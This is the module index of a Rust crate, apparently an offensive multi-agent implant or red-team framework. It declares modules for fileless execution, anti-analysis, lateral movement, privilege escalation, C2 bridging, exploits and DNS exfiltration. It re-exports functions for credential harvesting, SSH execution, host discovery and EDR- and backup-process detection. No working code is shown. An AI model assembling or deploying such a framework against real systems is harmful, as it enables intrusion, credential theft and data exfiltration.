pub mod comms;
pub mod identity;
pub mod ldc;
pub mod consensus;
pub mod utils;
pub mod ml;
pub mod shared_arena;
pub mod arena_mgr;
pub mod crypto;
pub mod fileless;
pub mod syscalls;
pub mod anti_analysis;
pub mod lateral;
pub mod exfil;
pub mod attack;
pub mod stack_spoof;
pub mod c2_bridge;
pub mod exploits;
pub mod config;
pub mod obfstr;
pub mod panal;
pub mod guardian;
pub mod wax;
pub mod nectar;
pub mod honeycomb;
pub mod hive_scale;
pub mod royal_jelly;
pub mod waggle_dance;
pub mod pheromone;
pub mod swarming;
pub mod hades_gate;
pub mod leech;
pub mod smoke_signals;
pub mod death_dance;
pub mod reactive_llm;
pub mod stigmergy;
pub mod hibernation;
pub mod channel_rotator;
pub mod federation;
pub mod privesc;
pub mod ephemeral;
pub mod lolbin;
pub mod marl_online;
pub mod larva;
pub mod did;
pub mod homomorphic;
pub mod system_info;
pub mod io_uring_ops;
pub mod propaganda;
pub mod saboteur;
pub mod tournament;
pub mod seer;
pub mod chrononaut;
pub mod phoenix;
pub mod hivemind;
pub mod whispernet;

pub use comms::HiveChamber;
pub use identity::AgentIdentity;
pub use ldc::{Message, Payload, Role, Value, Decision, SignedMessage};
pub use consensus::ConsensusEngine;
pub use crypto::{encrypt_chacha20, decrypt_chacha20, decrypt_model, derive_key, derive_seed};
pub use fileless::MemfdBinary;
pub use anti_analysis::AntiAnalysis;
pub use lateral::{harvest_credentials, exec_ssh, discover_hosts};
pub use exfil::{dns_exfiltrate, ExfilScheduler};
pub use attack::{generate_coverage_report, tag_action, techniques_by_module, TECHNIQUES};
pub use system_info::{SystemInfo, LinuxInfo, WindowsInfo, PlatformInfo, is_edr_process, is_backup_process};
